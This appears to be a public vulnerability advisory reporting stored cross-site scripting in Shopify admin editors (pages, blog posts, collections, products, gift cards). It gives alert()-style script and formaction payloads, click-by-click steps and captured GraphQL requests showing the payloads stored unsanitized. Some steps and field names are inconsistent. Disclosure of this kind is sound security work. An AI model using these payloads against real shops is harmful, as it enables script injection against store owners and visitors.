Shopify Cross Site Scripting

2023.03.14
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-79

Correspondence from Shopify declined to comment regarding new discovered vulnerabilities within their website. Although 'frontend' vulnerabilities are considered out of scope, person/tester foundhimself a beefy bugbounty from the same page that has been listed below, including similar functionality that has not been tested yet. Two emails and several reports, the 'hacker-1' staff reject the bid for findings. Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>-> Show HTML -> Fix HTML encoding of tags from &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt; <script src=1 href=1 onerror="javascript:alert(1)"></script> 1. Browse to Online Store 2. Select Pages -> Add Page 3. Set Title -> Title_Name 4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt; <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "page":{"bodyHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name" [...] Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title -> Content -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p>&lt;form&gt;&lt;button formaction="javascript:javascript:alert(1)"&gt;X&lt;/button&gt;&lt;/form&gt;</p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Online Store 2. Select Blog Posts -> Add Blog Post 3. Set Title -> Blog_Title 4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt; <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2" [...] Products -> Collections -> Create Collection -> Title -> Product_Title -> Description -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p>&lt;form&gt;&lt;button formaction="javascript:javascript:alert(1)"&gt;X&lt;/button&gt;&lt;/form&gt;</p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Select Collections -> Create Collection 3. Set Title -> Collection_Title 4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt; <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=CreateCollection&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "collection":{"title":"Collection_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>" [...] Products -> Inventory -> View Products -> Double Click on Product -> Title -> Inventory_Title -> Description -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p>&lt;form&gt;&lt;button formaction="javascript:javascript:alert(1)"&gt;X&lt;/button&gt;&lt;/form&gt;</p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Select Inventory-> View Products 3. Select Product -> Title -> Product_Title 4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt; <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>","workflow":"product-details-update" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>" [...] Products -> Add Product -> Title -> Product_Title -> Description -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p>&lt;form&gt;&lt;button formaction="javascript:javascript:alert(1)"&gt;X&lt;/button&gt;&lt;/form&gt;</p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Add Product -> Title -> Product_Title 3. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 4. Select Show HTML 5. Fix HTML encoding of tags &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt; <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"descriptionHtml":"<p>&nbsp;</p>...\"><script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n</code></pre>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "title":"Gift_Title","><script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n</code></pre>", [...] Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste Payload -> <form><button formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML -> Fix HTML encoding of tags from <p>&lt;form&gt;&lt;button formaction="javascript:javascript:alert(1)"&gt;X&lt;/button&gt;&lt;/form&gt;</p> to <p><form><button formaction="javascript:javascript:alert(1)">X<br /></button></form></p> 1. Browse to Products 2. Select Gift Cards 3. Add Gift Card Products -> Gift_Title 4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script> 5. Select Show HTML 6. Fix HTML encoding of tags &lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt; <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>" [...] 1. Browse to /admin/pages 2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload 3. Online Store -> Pages -> Add Page -> <form><button formaction="javascript:javascript:alert(1)">X</button></form> https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top